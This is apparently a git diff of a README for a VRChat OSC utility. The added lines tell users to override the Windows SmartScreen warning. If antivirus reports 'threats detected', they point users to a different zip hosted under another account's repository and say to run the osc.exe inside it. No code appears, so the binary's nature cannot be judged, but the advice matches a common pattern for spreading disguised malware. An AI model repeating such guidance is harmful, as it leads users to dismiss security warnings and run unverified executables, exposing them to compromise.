eepyfemboi/vrchat-osc-thing/README.md

 if osc is enabled and its not working, try refreshing the program (press enter) or checking ur firewall settings

-when trying to run the .exe, if windows says it protected ur pc, simply click more info then click run anyway
+when trying to run the .exe, if windows says it protected ur pc, simply click more info then click run anyway.

+if you get a notification about "threats detected", use this version instead: https://github.com/CoC-Fire/vrchat-osc-thing/raw/main/osc.zip

+to use the zip version, first extract the zip, then open the folder, then run the "osc.exe" contained within the folder

 gpu doesnt work for amd gpus for some reason